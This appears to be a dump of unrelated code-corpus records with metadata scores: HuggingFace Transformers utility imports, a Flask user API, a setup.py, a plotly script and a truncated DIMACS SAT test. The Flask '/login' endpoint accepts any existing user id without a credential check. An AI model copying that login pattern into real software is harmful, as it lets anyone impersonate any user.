is_spacy_available,
is_speech_available,
is_tensorflow_probability_available,
is_tf2onnx_available,
is_tf_available,
is_timm_available,
is_tokenizers_available,
is_torch_available,
is_torch_bf16_available,
is_torch_cuda_available,
is_torch_fx_available,
is_torch_fx_proxy,
is_torch_onnx_dict_inputs_support_available,
is_torch_tf32_available,
is_torch_tpu_available,
is_torchaudio_available,
is_torchdynamo_available,
is_training_run_on_sagemaker,
is_vision_available,
requires_backends,
tf_required,
torch_only_method,
torch_required,
torch_version,
)
WEIGHTS_NAME = "pytorch_model.bin"
WEIGHTS_INDEX_NAME = "pytorch_model.bin.index.json"
TF2_WEIGHTS_NAME = "tf_model.h5"
TF_WEIGHTS_NAME = "model.ckpt"
FLAX_WEIGHTS_NAME = "flax_model.msgpack"
CONFIG_NAME = "config.json"
FEATURE_EXTRACTOR_NAME = "preprocessor_config.json"
MODEL_CARD_NAME = "modelcard.json"
SENTENCEPIECE_UNDERLINE = "▁"
SPIECE_UNDERLINE = SENTENCEPIECE_UNDERLINE # Kept for backward compatibility
MULTIPLE_CHOICE_DUMMY_INPUTS = [
[[0, 1, 0, 1], [1, 0, 0, 1]]
] * 2 # Needs to have 0s and 1s only since XLM uses it for langs too.
DUMMY_INPUTS = [[7, 6, 0, 0, 1], [1, 2, 3, 0, 0], [0, 0, 0, 4, 5]]
DUMMY_MASK = [[1, 1, 1, 1, 1], [1, 1, 1, 0, 0], [0, 0, 0, 1, 1]]
def check_min_version(min_version):
if version.parse(__version__) < version.parse(min_version):
if "dev" in min_version:
error_message = (
"This example requires a source install from HuggingFace Transformers (see "
"`https://huggingface.co/transformers/installation.html#installing-from-source`),"
)
else:
error_message = f"This example requires a minimum version of {min_version},"
error_message += f" but the version found is {__version__}.\n"
raise ImportError(
error_message
+ "Check out https://huggingface.co/transformers/examples.html for the examples corresponding to other "
"versions of HuggingFace Transformers."
)
| #!/usr/bin/env python
# coding=utf-8
# flake8: noqa
# There's no way to ignore "F401 '...' imported but unused" warnings in this
# module, but to preserve other warnings. So, don't check this module at all.
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from packaging import version
from .. import __version__
from .doc import (
add_code_sample_docstrings,
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
copy_func,
replace_return_docstrings,
)
from .generic import (
ContextManagers,
ExplicitEnum,
ModelOutput,
PaddingStrategy,
TensorType,
cached_property,
find_labels,
flatten_dict,
is_tensor,
to_numpy,
to_py_obj,
)
from .hub import (
CLOUDFRONT_DISTRIB_PREFIX,
DISABLE_TELEMETRY,
HF_MODULES_CACHE,
HUGGINGFACE_CO_PREFIX,
HUGGINGFACE_CO_RESOLVE_ENDPOINT,
PYTORCH_PRETRAINED_BERT_CACHE,
PYTORCH_TRANSFORMERS_CACHE,
S3_BUCKET_PREFIX,
TRANSFORMERS_CACHE,
TRANSFORMERS_DYNAMIC_MODULE_NAME,
EntryNotFoundError,
PushToHubMixin,
RepositoryNotFoundError,
RevisionNotFoundError,
cached_path,
default_cache_path,
define_sagemaker_information,
filename_to_url,
get_cached_models,
get_file_from_repo,
get_from_cache,
get_full_repo_name,
get_list_of_files,
has_file,
hf_bucket_url,
http_get,
http_user_agent,
is_local_clone,
is_offline_mode,
is_remote_url,
send_example_telemetry,
url_to_filename,
)
from .import_utils import (
ENV_VARS_TRUE_AND_AUTO_VALUES,
ENV_VARS_TRUE_VALUES,
TORCH_FX_REQUIRED_VERSION,
USE_JAX,
USE_TF,
USE_TORCH,
DummyObject,
OptionalDependencyNotAvailable,
_LazyModule,
is_accelerate_available,
is_apex_available,
is_bitsandbytes_available,
is_coloredlogs_available,
is_datasets_available,
is_detectron2_available,
is_faiss_available,
is_flax_available,
is_ftfy_available,
is_in_notebook,
is_ipex_available,
is_librosa_available,
is_onnx_available,
is_pandas_available,
is_phonemizer_available,
is_protobuf_available,
is_psutil_available,
is_py3nvml_available,
is_pyctcdecode_available,
is_pytesseract_available,
is_pytorch_quantization_available,
is_rjieba_available,
is_sagemaker_dp_enabled,
is_sagemaker_mp_enabled,
is_scatter_available,
is_scipy_available,
is_sentencepiece_available,
is_sklearn_available,
is_soundfile_availble,
is_spacy_available,
is_speech_available,
is_tensorflow_probability_available,
is_tf2onnx_available,
is_tf_available,
is_timm_available,
is_tokenizers_available,
is_torch_available,
is_torch_bf16_available,
is_torch_cuda_available,
is_torch_fx_available,
is_torch_fx_proxy,
is_torch_onnx_dict_inputs_support_available,
is_torch_tf32_available,
is_torch_tpu_available,
is_torchaudio_available,
is_torchdynamo_available,
is_training_run_on_sagemaker,
is_vision_available,
requires_backends,
tf_required,
torch_only_method,
torch_required,
torch_version,
)
WEIGHTS_NAME = "pytorch_model.bin"
WEIGHTS_INDEX_NAME = "pytorch_model.bin.index.json"
TF2_WEIGHTS_NAME = "tf_model.h5"
TF_WEIGHTS_NAME = "model.ckpt"
FLAX_WEIGHTS_NAME = "flax_model.msgpack"
CONFIG_NAME = "config.json"
FEATURE_EXTRACTOR_NAME = "preprocessor_config.json"
MODEL_CARD_NAME = "modelcard.json"
SENTENCEPIECE_UNDERLINE = "▁"
SPIECE_UNDERLINE = SENTENCEPIECE_UNDERLINE # Kept for backward compatibility
MULTIPLE_CHOICE_DUMMY_INPUTS = [
[[0, 1, 0, 1], [1, 0, 0, 1]]
] * 2 # Needs to have 0s and 1s only since XLM uses it for langs too.
DUMMY_INPUTS = [[7, 6, 0, 0, 1], [1, 2, 3, 0, 0], [0, 0, 0, 4, 5]]
DUMMY_MASK = [[1, 1, 1, 1, 1], [1, 1, 1, 0, 0], [0, 0, 0, 1, 1]]
def check_min_version(min_version):
if version.parse(__version__) < version.parse(min_version):
if "dev" in min_version:
error_message = (
"This example requires a source install from HuggingFace Transformers (see "
"`https://huggingface.co/transformers/installation.html#installing-from-source`),"
)
else:
error_message = f"This example requires a minimum version of {min_version},"
error_message += f" but the version found is {__version__}.\n"
raise ImportError(
error_message
+ "Check out https://huggingface.co/transformers/examples.html for the examples corresponding to other "
"versions of HuggingFace Transformers."
)
| en | 0.848802 | #!/usr/bin/env python # coding=utf-8 # flake8: noqa # There's no way to ignore "F401 '...' imported but unused" warnings in this # module, but to preserve other warnings. So, don't check this module at all. # Copyright 2021 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Kept for backward compatibility # Needs to have 0s and 1s only since XLM uses it for langs too. #installing-from-source`)," | 1.291974 | 1 |
app/modules/api/user/user.py | FannyFirst/BunShop-flask | 0 | 6632500 | <reponame>FannyFirst/BunShop-flask
from flask_restplus import Namespace, Resource
from flask import request
from app.modules.dao.user.user import User
from app.extensions.response import *
api = Namespace("User", "user api", "/user")
DAO = User()
@api.route("/")
class UserList(Resource):
def get(self):
return response(DAO.list())
# @api.route("/<int:_id>")
# class User(Resource):
#
# def get(self, _id):
# return response(DAO.get(_id))
#
# # @api.param("name", "user name")
# # def put(self, _id):
# # name = request.args.get("name")
# # if name is None:
# # return response(code=BaseResponse.PARAM_NOT_ALLOW)
# # return response(DAO.update(_id, name))
#
# def delete(self, _id):
# return response(DAO.status(_id))
@api.route("/login")
class UserAuth(Resource):
def post(self):
_id = request.args.get("id")
if _id is not None:
try:
_id = int(_id)
except ValueError:
return response(BaseResponse.PARAM_TYPE_NOT_ALLOW)
user = DAO.get(_id)
if user != -1:
return response(_id)
return response(DAO.create())
| from flask_restplus import Namespace, Resource
from flask import request
from app.modules.dao.user.user import User
from app.extensions.response import *
api = Namespace("User", "user api", "/user")
DAO = User()
@api.route("/")
class UserList(Resource):
def get(self):
return response(DAO.list())
# @api.route("/<int:_id>")
# class User(Resource):
#
# def get(self, _id):
# return response(DAO.get(_id))
#
# # @api.param("name", "user name")
# # def put(self, _id):
# # name = request.args.get("name")
# # if name is None:
# # return response(code=BaseResponse.PARAM_NOT_ALLOW)
# # return response(DAO.update(_id, name))
#
# def delete(self, _id):
# return response(DAO.status(_id))
@api.route("/login")
class UserAuth(Resource):
def post(self):
_id = request.args.get("id")
if _id is not None:
try:
_id = int(_id)
except ValueError:
return response(BaseResponse.PARAM_TYPE_NOT_ALLOW)
user = DAO.get(_id)
if user != -1:
return response(_id)
return response(DAO.create()) | en | 0.323865 | # @api.route("/<int:_id>") # class User(Resource): # # def get(self, _id): # return response(DAO.get(_id)) # # # @api.param("name", "user name") # # def put(self, _id): # # name = request.args.get("name") # # if name is None: # # return response(code=BaseResponse.PARAM_NOT_ALLOW) # # return response(DAO.update(_id, name)) # # def delete(self, _id): # return response(DAO.status(_id)) | 2.715583 | 3 |
setup.py | kokron/anzu | 6 | 6632501 | <filename>setup.py
from setuptools import setup, find_packages
setup(
name='anzu',
version='1.0',
packages=find_packages(),
package_dir={'anzu' : 'anzu'},
package_data={'anzu': ['data/*']},
long_description=open('README.md').read(),
)
| <filename>setup.py
from setuptools import setup, find_packages
setup(
name='anzu',
version='1.0',
packages=find_packages(),
package_dir={'anzu' : 'anzu'},
package_data={'anzu': ['data/*']},
long_description=open('README.md').read(),
)
| none | 1 | 1.391882 | 1 |
|
csv files/scatter.py | hriday-wpo8a/c103 | 0 | 6632502 | <filename>csv files/scatter.py
import pandas as pd
import plotly.express as px
df=pd.read_csv("data.csv")
fig = px.scatter(df,x="Population",y="Per capita",size="Percentage",color="Country",size_max = 60)
fig.show() | <filename>csv files/scatter.py
import pandas as pd
import plotly.express as px
df=pd.read_csv("data.csv")
fig = px.scatter(df,x="Population",y="Per capita",size="Percentage",color="Country",size_max = 60)
fig.show() | none | 1 | 3.712196 | 4 |
|
tests/sat/Intensive/c890.200.UNSAT.dimacs.test.py | bernardocuteri/wasp | 19 | 6632503 | <filename>tests/sat/Intensive/c890.200.UNSAT.dimacs.test.py
input = """
c num blocks = 1
c num vars = 200
c minblockids[0] = 1
c maxblockids[0] = 200
p cnf 200 890
-80 -16 -14 0
-14 -200 -190 0
61 -149 133 0
-86 -126 -9 0
11 -79 -15 0
-119 -191 -174 0
-154 -29 -134 0
-78 -118 76 0
-106 119 173 0
131 -140 -141 0
64 18 -147 0
-132 -12 158 0
122 -143 -117 0
-5 80 -128 0
-113 -108 -171 0
62 -134 -159 0
63 118 12 0
-127 -98 41 0
-190 172 -182 0
153 -77 143 0
-142 138 53 0
-70 -125 -160 0
120 195 108 0
-177 -184 -106 0
-168 175 160 0
-153 -84 -96 0
-42 133 190 0
-24 -78 -162 0
5 -105 73 0
105 19 -130 0
151 -142 -95 0
86 -156 173 0
180 172 98 0
186 130 65 0
-84 126 -57 0
-88 8 -126 0
43 -172 -185 0
-99 149 -83 0
13 61 169 0
197 -56 -142 0
98 73 118 0
-124 9 -90 0
150 29 72 0
13 -59 183 0
-7 23 78 0
67 1 -158 0
-151 142 -35 0
-62 198 -99 0
-43 -111 157 0
-197 -193 -141 0
-179 5 -50 0
105 74 134 0
-86 12 33 0
71 -151 88 0
-119 11 -48 0
-133 158 53 0
196 -64 -199 0
186 42 -105 0
-137 189 139 0
-95 46 3 0
-160 -41 -176 0
-12 -173 20 0
146 149 21 0
-174 -103 164 0
-21 -96 145 0
-191 137 97 0
32 -183 180 0
-130 78 59 0
-5 157 166 0
167 -112 -179 0
-10 107 -161 0
54 -34 93 0
-138 47 -193 0
-42 -8 159 0
-84 35 93 0
-182 -100 32 0
-50 101 63 0
23 22 167 0
-21 -77 134 0
111 -107 159 0
-77 -7 114 0
40 41 -166 0
165 -21 15 0
-100 166 80 0
-118 162 -180 0
-190 62 -159 0
-72 113 -2 0
-110 167 -45 0
-79 -143 138 0
172 126 32 0
-117 43 -102 0
-12 81 -58 0
54 191 171 0
-161 -103 -126 0
99 28 143 0
138 111 -42 0
112 95 -88 0
167 -95 140 0
87 -150 105 0
-39 65 -81 0
-115 145 104 0
-118 22 3 0
63 -16 197 0
128 -153 -100 0
-139 5 -166 0
37 68 171 0
82 9 -125 0
191 -59 77 0
71 82 -2 0
-8 134 74 0
-32 -44 165 0
-101 114 -131 0
51 199 -46 0
110 -90 -6 0
-187 -21 -139 0
-154 12 -140 0
-139 -123 195 0
-41 -157 -58 0
25 -137 -52 0
61 -38 -57 0
-172 131 126 0
-104 90 -142 0
44 -198 179 0
16 -82 87 0
-134 14 48 0
-163 -64 24 0
-138 -127 -141 0
-51 -180 -54 0
-23 90 102 0
174 -118 -134 0
131 -69 -92 0
76 -111 -19 0
96 -72 151 0
42 -47 122 0
-99 -107 -17 0
-39 97 198 0
-111 159 66 0
133 -176 -30 0
-16 -58 87 0
-42 32 -94 0
-199 184 -146 0
-106 -7 -94 0
79 126 -185 0
-152 151 -13 0
-69 -184 25 0
-128 131 182 0
-192 29 -74 0
31 -177 -21 0
-123 30 -132 0
53 13 38 0
-3 185 -77 0
-167 -98 71 0
155 58 -90 0
143 -189 -174 0
91 110 -116 0
181 -157 19 0
-26 189 151 0
-63 167 2 0
-60 113 -57 0
64 -25 180 0
15 -12 97 0
-145 136 124 0
11 -73 -107 0
-135 -86 -73 0
-53 -166 -11 0
105 187 -102 0
22 1 -26 0
-12 142 -167 0
123 107 174 0
-26 -128 -162 0
-118 -74 133 0
95 -144 54 0
-1 -165 -188 0
-113 154 -175 0
92 -59 98 0
-111 70 -128 0
3 -21 89 0
87 -195 142 0
93 -144 -90 0
177 -120 52 0
169 141 -5 0
75 -10 -192 0
-33 -22 -66 0
6 183 196 0
-143 146 73 0
-168 124 -139 0
15 -17 124 0
-65 184 -82 0
-148 -100 -141 0
72 64 -10 0
-190 1 -150 0
2 -17 -96 0
-4 -160 105 0
-100 -122 -23 0
-102 22 -128 0
-139 181 102 0
-8 -105 120 0
-141 159 -174 0
112 124 122 0
-66 -167 131 0
155 -176 -27 0
44 -124 -103 0
-162 -142 63 0
46 -158 136 0
187 12 -90 0
-91 136 -24 0
147 130 -33 0
64 32 56 0
-54 -10 -179 0
-127 -132 -74 0
-123 -15 120 0
161 80 60 0
-72 116 113 0
85 -39 -160 0
12 125 -135 0
-20 -15 -195 0
109 -114 -185 0
115 -185 200 0
-90 -142 -80 0
19 -94 43 0
24 43 -57 0
-50 69 15 0
-117 -133 84 0
-163 -85 -35 0
91 70 175 0
-10 -20 127 0
144 40 -184 0
-104 -36 21 0
-122 131 18 0
59 115 16 0
154 -14 -8 0
-182 -105 20 0
198 -30 56 0
-57 -176 97 0
45 -195 191 0
55 193 -31 0
54 67 15 0
146 136 119 0
164 36 -100 0
4 -197 139 0
187 189 144 0
-183 36 154 0
47 173 -159 0
93 -78 -146 0
-170 9 131 0
-174 -186 38 0
102 29 -63 0
46 137 -138 0
-192 54 -17 0
-108 -54 5 0
-144 111 68 0
133 -69 35 0
30 -28 66 0
-62 156 31 0
157 -32 95 0
-73 21 144 0
-14 172 -30 0
-15 143 -107 0
-70 86 141 0
77 192 144 0
-80 -94 133 0
95 17 -148 0
66 15 159 0
-136 -58 62 0
75 -21 191 0
161 -12 175 0
-42 -117 -18 0
-192 147 -1 0
-28 -137 -151 0
41 17 146 0
-186 -182 105 0
-44 102 85 0
183 29 32 0
-84 32 167 0
21 -197 -172 0
-142 19 54 0
-107 -173 -143 0
-24 165 79 0
-138 -17 75 0
-93 -108 178 0
-104 77 138 0
-164 37 -97 0
51 55 -171 0
70 103 -191 0
-161 46 -13 0
-123 6 173 0
4 73 -60 0
-170 -114 -56 0
-179 -191 -172 0
149 145 43 0
-118 91 -51 0
-12 152 167 0
-196 -162 -9 0
-38 -17 -110 0
-96 -5 -36 0
97 109 -191 0
-89 -38 31 0
70 -184 94 0
-144 -146 11 0
-32 104 144 0
136 -163 -14 0
51 -4 -12 0
66 48 -153 0
-44 -10 8 0
54 106 102 0
5 58 78 0
-142 170 83 0
39 -173 -175 0
196 -149 104 0
160 4 44 0
-101 36 -50 0
-86 -62 -163 0
-85 -49 -169 0
-97 -145 93 0
147 35 38 0
13 28 -30 0
-64 -175 18 0
-144 129 33 0
-149 -158 -21 0
-152 -22 -92 0
-23 90 -111 0
189 -176 -65 0
-107 -94 -146 0
113 106 45 0
186 -47 -115 0
141 -4 -142 0
-93 -5 46 0
-183 -191 -187 0
18 12 168 0
-14 -30 177 0
-50 104 15 0
178 -165 -6 0
-55 7 -179 0
-77 -7 -135 0
28 106 -134 0
-138 -159 -192 0
-83 1 164 0
33 39 91 0
107 -170 72 0
179 -115 69 0
139 179 -88 0
99 68 154 0
-175 26 130 0
174 159 -134 0
-73 -182 -191 0
10 -28 16 0
119 36 -103 0
-35 51 -17 0
-197 -58 -185 0
-149 -155 166 0
-104 -155 -140 0
-48 -194 47 0
6 4 170 0
-51 189 -59 0
67 9 92 0
111 -149 -144 0
-17 -65 75 0
6 166 17 0
-55 -124 61 0
62 -175 77 0
46 81 -170 0
-158 159 -153 0
108 34 -31 0
118 133 1 0
137 -105 -63 0
138 51 -142 0
27 -57 -103 0
106 -158 -55 0
-180 -139 -199 0
-15 -151 182 0
24 -97 40 0
-152 -59 -85 0
-159 39 124 0
-157 55 -126 0
67 -140 36 0
109 -167 -187 0
51 189 -12 0
30 110 -190 0
-120 -3 -133 0
1 -81 -174 0
170 -77 123 0
-16 -64 48 0
51 9 -122 0
197 -90 76 0
-184 144 -156 0
-146 26 -186 0
44 -114 13 0
192 24 170 0
-14 144 177 0
-116 -45 189 0
-163 93 -78 0
-177 -196 -51 0
-165 104 4 0
140 -21 138 0
69 182 33 0
132 -54 183 0
16 -58 183 0
13 -132 -166 0
146 54 94 0
-156 -162 98 0
-60 -54 -145 0
-186 126 -75 0
-85 -3 148 0
190 -162 -6 0
-115 -30 32 0
-182 -113 22 0
21 -121 73 0
55 -82 87 0
-148 -36 182 0
-178 96 -183 0
-163 -179 43 0
-161 120 135 0
114 46 176 0
143 -79 -165 0
-32 60 100 0
18 -21 135 0
-140 173 127 0
-117 129 -102 0
110 -127 80 0
-91 61 200 0
-79 -168 198 0
144 -90 27 0
188 -196 -190 0
-5 -26 58 0
11 43 -195 0
-17 83 5 0
154 -72 17 0
-77 -167 -67 0
-33 60 68 0
-137 -37 22 0
69 54 -80 0
119 -141 -73 0
124 -193 -81 0
123 164 -94 0
-179 119 51 0
21 -84 -72 0
146 -8 -50 0
-200 198 190 0
-138 161 68 0
-139 134 -58 0
-121 85 -133 0
-5 -186 71 0
-188 -106 184 0
122 -3 10 0
1 144 -85 0
-117 19 -123 0
-158 23 -90 0
96 -125 -141 0
-25 136 40 0
134 -81 -76 0
84 -167 -99 0
141 -110 -115 0
-95 98 -73 0
-151 31 -183 0
168 -44 -129 0
162 32 -111 0
-10 106 164 0
-46 -117 -163 0
-10 -39 162 0
54 -139 -119 0
73 -67 173 0
67 92 -64 0
-84 51 194 0
61 -74 -41 0
-61 -24 57 0
186 -27 82 0
-156 41 -127 0
102 -179 89 0
-71 155 33 0
61 -68 55 0
193 -78 57 0
6 -120 -110 0
-103 -52 5 0
-54 184 -62 0
-115 -39 -174 0
58 196 152 0
-152 -3 -142 0
1 -83 142 0
-77 24 -131 0
123 122 -2 0
-41 -147 -163 0
102 -60 -84 0
-118 70 193 0
-44 -156 23 0
-8 147 -114 0
93 115 -72 0
125 -158 -148 0
-151 -28 -71 0
151 -75 -65 0
-186 -41 193 0
-141 -119 -147 0
-196 51 31 0
-119 164 19 0
51 -40 101 0
94 -171 -175 0
120 130 -84 0
-74 -64 -150 0
-133 72 78 0
-45 118 105 0
67 164 -137 0
-176 -89 -158 0
-168 80 12 0
167 -168 -8 0
182 84 7 0
-13 165 -124 0
95 -187 -193 0
184 -91 80 0
-15 -35 -71 0
-9 137 68 0
76 -75 -87 0
-59 -120 -154 0
-131 8 55 0
43 -89 -108 0
89 148 56 0
-166 -9 42 0
-192 -95 133 0
195 -182 -124 0
-29 199 -3 0
-11 -186 -8 0
195 -110 65 0
-12 167 85 0
-41 50 117 0
-192 11 -181 0
86 -194 -165 0
-29 -111 93 0
122 5 -92 0
13 -79 108 0
-89 184 95 0
-142 -127 66 0
-110 81 104 0
-154 -44 9 0
-159 -143 -12 0
120 14 -8 0
-114 102 -172 0
22 149 -108 0
-151 -152 -20 0
-101 -22 110 0
-43 -115 176 0
68 -61 51 0
105 -63 -112 0
177 -179 185 0
113 39 -111 0
138 -115 133 0
-153 -91 -52 0
-189 -22 -49 0
-195 -20 30 0
-45 89 137 0
-199 126 143 0
194 147 7 0
35 53 -50 0
-194 -87 116 0
-73 70 -83 0
145 -129 54 0
-195 -127 -16 0
-174 -20 128 0
-40 -172 120 0
195 -97 184 0
-51 155 63 0
91 168 -176 0
-193 167 1 0
153 35 83 0
122 145 185 0
-31 87 -64 0
1 21 53 0
37 -169 120 0
130 -48 -86 0
-27 -34 79 0
-61 181 -57 0
12 68 -4 0
-66 198 -99 0
-110 50 -66 0
-88 -26 -74 0
-35 64 187 0
-78 -197 190 0
191 -137 47 0
75 -18 63 0
190 166 72 0
98 -120 -88 0
-163 -14 140 0
-144 -149 -86 0
114 146 -69 0
-179 182 144 0
98 -186 -46 0
16 3 -166 0
-196 88 -150 0
190 35 166 0
-191 178 18 0
195 -111 41 0
-63 190 184 0
119 159 28 0
-167 -125 6 0
-173 49 -147 0
-174 -82 -129 0
-24 -16 -53 0
-79 -122 -64 0
-119 190 -129 0
-29 -106 -152 0
22 -110 143 0
-45 54 40 0
-155 -103 -2 0
-195 -139 131 0
145 -48 -64 0
115 -181 79 0
-190 145 -5 0
-92 164 -47 0
-75 127 -169 0
-10 -100 193 0
-129 37 -167 0
106 20 172 0
-43 -40 -129 0
-7 107 -133 0
-73 -84 161 0
-78 94 80 0
4 -129 149 0
-47 58 118 0
-120 116 -155 0
-100 -87 78 0
106 141 190 0
-15 22 86 0
187 174 -90 0
61 -21 -153 0
-12 -200 -95 0
-85 -158 114 0
-15 -172 150 0
54 -36 96 0
122 35 95 0
185 149 -68 0
-138 46 -56 0
115 39 -119 0
-83 -131 -12 0
92 157 192 0
-33 107 -198 0
122 182 -7 0
-71 65 63 0
107 -178 46 0
166 3 87 0
-52 18 -131 0
-138 -196 -48 0
-128 -37 50 0
125 -194 -101 0
-36 20 23 0
-6 -127 -2 0
103 -137 -60 0
86 77 117 0
200 171 -16 0
91 -5 -48 0
115 -2 85 0
151 -55 41 0
-46 -1 171 0
164 173 -105 0
15 46 -126 0
-161 117 107 0
140 84 -49 0
-167 194 77 0
136 71 -70 0
196 75 47 0
54 103 126 0
-77 159 -147 0
21 18 108 0
172 31 85 0
180 -44 -198 0
42 -122 39 0
179 -52 -106 0
79 146 -105 0
-120 156 69 0
15 -153 -10 0
-118 -113 -33 0
-129 56 34 0
-8 -199 73 0
-103 -133 147 0
-177 -42 54 0
162 -168 55 0
17 -107 -34 0
-62 -149 -199 0
168 -93 135 0
74 128 62 0
117 158 188 0
-139 -164 -118 0
62 29 57 0
86 -28 124 0
-198 -51 -68 0
-139 -113 -98 0
23 -98 -171 0
-121 -139 -53 0
-138 -92 67 0
-146 3 -103 0
-190 126 83 0
131 -87 21 0
117 107 -69 0
16 183 -4 0
150 -200 -18 0
179 -184 -193 0
108 -7 -178 0
-112 27 97 0
37 -61 13 0
188 82 101 0
-4 -124 -46 0
53 188 74 0
-14 129 194 0
25 60 94 0
-190 -5 119 0
-54 11 -166 0
-102 -77 158 0
91 -20 -102 0
160 58 46 0
124 -164 -147 0
65 -38 -157 0
91 -86 122 0
-191 69 -167 0
-172 -138 118 0
-52 61 145 0
-31 41 -4 0
-77 -38 33 0
-97 162 -26 0
-121 25 153 0
68 -48 142 0
130 65 50 0
-103 115 177 0
-56 126 158 0
99 162 -171 0
6 168 -55 0
34 -61 77 0
-23 158 -101 0
127 136 20 0
146 180 106 0
130 32 -173 0
13 169 198 0
-108 59 -42 0
87 -162 173 0
196 173 157 0
12 186 -135 0
-60 117 177 0
-22 -96 -27 0
-116 -94 141 0
-137 -170 164 0
-110 106 -13 0
35 -118 106 0
-167 190 45 0
127 -187 -196 0
-50 41 -132 0
143 121 169 0
-62 -69 -68 0
-60 198 -18 0
-62 58 -158 0
135 10 -68 0
-145 -10 -36 0
-187 -91 131 0
195 84 36 0
-181 50 -79 0
12 61 -14 0
139 -30 -123 0
-51 -184 39 0
-37 23 18 0
191 -120 156 0
83 103 124 0
-171 199 156 0
-41 64 -157 0
-181 162 199 0
8 -158 -160 0
-21 -37 163 0
42 137 190 0
-123 -70 50 0
9 127 187 0
16 169 -114 0
179 142 28 0
7 147 191 0
48 -58 -198 0
-118 -10 185 0
57 -107 -106 0
65 96 173 0
54 64 66 0
-160 193 -101 0
199 65 -76 0
-141 138 157 0
81 102 163 0
180 -132 -134 0
154 5 175 0
-120 42 -64 0
109 -143 88 0
75 71 77 0
-19 -10 -123 0
12 45 71 0
127 -158 199 0
98 -198 120 0
-116 129 166 0
124 -186 -34 0
-63 -140 195 0
-162 172 19 0
190 107 76 0
-108 -193 -24 0
-54 -148 -132 0
158 184 83 0
-75 -4 101 0
49 96 17 0
-19 104 -73 0
197 159 101 0
172 196 3 0
-132 192 -120 0
-151 -92 -200 0
-147 -128 -179 0
89 188 191 0
-152 -102 -175 0
177 -133 -127 0
-69 -80 -154 0
160 -122 -67 0
117 95 31 0
187 -114 55 0
-52 102 -18 0
-34 -111 -131 0
70 93 -152 0
-72 -58 -60 0
-151 196 -59 0
12 -159 -1 0
-173 133 167 0
198 61 166 0
-188 94 8 0
-156 39 -2 0
184 -151 -89 0
-112 -160 -144 0
156 35 123 0
27 -84 105 0
-166 -50 157 0
-168 -26 179 0
74 96 94 0
199 195 178 0
114 -27 144 0
48 105 53 0
128 -117 -34 0
-28 -109 -159 0
197 40 23 0
142 20 -42 0
-21 103 -12 0
122 -31 40 0
-24 -10 -57 0
110 -123 72 0
114 20 -160 0
-14 94 -121 0
-31 195 -163 0
-98 -45 143 0
-110 -3 -195 0
142 86 -186 0
194 -125 28 0
-60 129 -180 0
134 141 197 0
-92 -68 30 0
182 6 96 0
146 -195 14 0
-78 -56 -61 0
-78 139 144 0
-190 -48 -163 0
-19 -40 -181 0
-92 -191 25 0
-156 122 38 0
195 13 -190 0
99 -57 -184 0
141 -124 -113 0
-81 38 40 0
68 199 -12 0
-178 -118 -20 0
-188 183 -96 0
190 144 121 0
43 -111 40 0
-10 -39 -68 0
-42 -17 83 0
-135 -101 -82 0
-153 198 -23 0
-188 -86 146 0
-26 -126 -89 0
-113 135 93 0
-161 20 -162 0
165 1 106 0
-159 -27 79 0
78 -60 184 0
79 -53 -166 0
106 170 -55 0
-19 -30 90 0
-152 176 56 0
-108 91 -50 0
-104 100 -171 0
85 -197 -93 0
99 106 12 0
20 -108 -103 0
-142 -92 137 0
70 75 -10 0
30 51 -129 0
-132 -38 63 0
-59 66 48 0
-88 -118 43 0
-71 200 -182 0
6 -177 -172 0
"""
output = "UNSAT"
| <filename>tests/sat/Intensive/c890.200.UNSAT.dimacs.test.py
input = """
c num blocks = 1
c num vars = 200
c minblockids[0] = 1
c maxblockids[0] = 200
p cnf 200 890
-80 -16 -14 0
-14 -200 -190 0
61 -149 133 0
-86 -126 -9 0
11 -79 -15 0
-119 -191 -174 0
-154 -29 -134 0
-78 -118 76 0
-106 119 173 0
131 -140 -141 0
64 18 -147 0
-132 -12 158 0
122 -143 -117 0
-5 80 -128 0
-113 -108 -171 0
62 -134 -159 0
63 118 12 0
-127 -98 41 0
-190 172 -182 0
153 -77 143 0
-142 138 53 0
-70 -125 -160 0
120 195 108 0
-177 -184 -106 0
-168 175 160 0
-153 -84 -96 0
-42 133 190 0
-24 -78 -162 0
5 -105 73 0
105 19 -130 0
151 -142 -95 0
86 -156 173 0
180 172 98 0
186 130 65 0
-84 126 -57 0
-88 8 -126 0
43 -172 -185 0
-99 149 -83 0
13 61 169 0
197 -56 -142 0
98 73 118 0
-124 9 -90 0
150 29 72 0
13 -59 183 0
-7 23 78 0
67 1 -158 0
-151 142 -35 0
-62 198 -99 0
-43 -111 157 0
-197 -193 -141 0
-179 5 -50 0
105 74 134 0
-86 12 33 0
71 -151 88 0
-119 11 -48 0
-133 158 53 0
196 -64 -199 0
186 42 -105 0
-137 189 139 0
-95 46 3 0
-160 -41 -176 0
-12 -173 20 0
146 149 21 0
-174 -103 164 0
-21 -96 145 0
-191 137 97 0
32 -183 180 0
-130 78 59 0
-5 157 166 0
167 -112 -179 0
-10 107 -161 0
54 -34 93 0
-138 47 -193 0
-42 -8 159 0
-84 35 93 0
-182 -100 32 0
-50 101 63 0
23 22 167 0
-21 -77 134 0
111 -107 159 0
-77 -7 114 0
40 41 -166 0
165 -21 15 0
-100 166 80 0
-118 162 -180 0
-190 62 -159 0
-72 113 -2 0
-110 167 -45 0
-79 -143 138 0
172 126 32 0
-117 43 -102 0
-12 81 -58 0
54 191 171 0
-161 -103 -126 0
99 28 143 0
138 111 -42 0
112 95 -88 0
167 -95 140 0
87 -150 105 0
-39 65 -81 0
-115 145 104 0
-118 22 3 0
63 -16 197 0
128 -153 -100 0
-139 5 -166 0
37 68 171 0
82 9 -125 0
191 -59 77 0
71 82 -2 0
-8 134 74 0
-32 -44 165 0
-101 114 -131 0
51 199 -46 0
110 -90 -6 0
-187 -21 -139 0
-154 12 -140 0
